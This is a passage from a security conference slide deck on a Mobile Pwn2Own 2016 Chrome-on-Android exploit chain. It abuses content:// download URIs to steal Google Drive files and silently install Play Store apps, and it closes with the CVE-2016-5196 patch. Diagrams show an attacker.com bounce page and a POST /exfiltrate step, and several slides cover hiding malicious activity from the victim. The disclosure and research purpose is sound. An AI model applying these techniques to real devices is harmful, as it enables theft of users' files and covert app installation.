  • 50. evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html GET /img?id=12345678 img_foo.jpg (download) POST /exfiltrate history.back(); img_foo.jpg (download) GET my_downloads/56 my_drive.html GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
  • 51. LLL TTT TTT LLL TTT TTT LLL TTT TTT mMMMm.mMMm. AAAAa. LLL .cCCCCc .oOOo. NNNNNn. TTTTTT .eEEe. NNNNNn. TTTTTT MMM "MMM "MMm "AAa LLL cCCC" oOO""OOo NNN "NNn TTT eEE EEe NNN "NNn TTT MMM MMM MMM .aAAAAAA LLL ====== CCC OOO OOO NNN NNN TTT EEEEEEEE NNN NNN TTT MMM MMM MMM AAA AAA LLL CCCc. oOO..OOo NNN NNN tTTt. EEe. NNN NNN TTTt. MMM MMM MMM "YAAAAAA LLL "CCCCCc "OOOO" NNN NNN "tTTT "EEEEE NNN NNN "TTTT
  • 53. Mobile Pwn2Own 2016 Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
  • 54. Bettererer Exploit • We can also make POST requests • Download pages containing CSRF token • Use CSRF token in POST request • We’ve got everything now…
  • 55. Exploit #3 – Install APK from Play Store • Grab a CSRF token https://play.google.com/store • Grab victim’s device ID sa https://play.google.com/settings • Install APK via POST request using CSRF token and device ID function(){window._uc='[x22Kx1pa-cDQOe_1C6Q0J2ixtQT22:1477462478689x22, x220x22, x22enx22,x22GBx22, <tr class="excPab-rAew03" id="g1921daaeef107b4" data-device-id=" g1921daaeef107b4" data-nickname="" data-visible="true" jsname="fscTHd"> id=com.mylittlepony.game&device=g1921daaeef107b4&token=Ka1pa- dDQOe_1C6Q0J2ixtQT32:1477462478689 https://play.google.com/store/install?authuser=0
  • 56. Exploit #3 – Install APK from Play Store evil.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager
  • 57. Exploit #3 – Install APK from Play Store evil.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
  • 58. store.html (download) GET /store.html Exploit #3 – Install APK from Play Store evil.html store.html (download) GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager https://attacker.com/bounce.html
  • 59. store.html (download) GET /store.html Exploit #3 – Install APK from Play Store evil.html store.html (download) history.back(); GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
  • 60. store.html (download) GET /store.html GET my_downloads/55 store.html settings.html (download) GET /settings.html Exploit #3 – Install APK from Play Store evil.html store.html (download) history.back(); settings.html (download) GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager
  • 61. store.html (download) GET /store.html GET my_downloads/55 store.html POST /install settings.html (download) GET /settings.html Exploit #3 – Install APK from Play Store evil.html store.html (download) history.back(); settings.html (download) GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager GET my_downloads/56 settings.html
  • 62. Mobile Pwn2Own 2016 Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
  • 63. Keep calm and… aw, snap! • Pending Chrome update?! • Automatic updates failed us • Segmentation fault from AJAX requests • Never had time to investigate • Can still use HTML forms to POST back • Absolute mess compared to AJAX
  • 64. Where did this bug feature come from?
  • 65. Exploit Improvement • Removing Pwn2Own debugging • Completely removing AJAX • Moving the bulk of the logic off to the agent • Intelligent agent • Less C&C traffic • Hiding malicious activities from the user
  • 66. Changing Focus • Prompt for redirecting to another application • Media players, PDF readers and other applications • <a href=‘rtsp://sexy.time.gov.uk/cam1’>Click me!</a> • In focus test in JavaScript • document.hidden == true
  • 67. Toasts • Small popups at the bottom of the screen • Automatic file downloads • “Downloading…”
  • 69. Going Further • Wait for the screen to get locked? • JS is slightly delayed when the browser isn’t in focus, or the lock screen is activated • Loop JS function every 100 ms • Test time passed since last function call
  • 70. How realistic is this? 700 750 800 850 900 950 1000 1050 1100 Minimised
  • 71. How realistic is this? 700 750 800 850 900 950 1000 1050 1100 Minimised Locked
  • 72. The Patch • CVE-2016-5196 • Chromium Bug ID 659492 • The content scheme is now a local scheme • Similar to file:// scheme • Cannot redirect from http:// to content:// • Cannot read other content:// files
  • 73. Conclusion • Hunting logic flaws can be rewarding • Outside-the-box thinking • Creativity exercise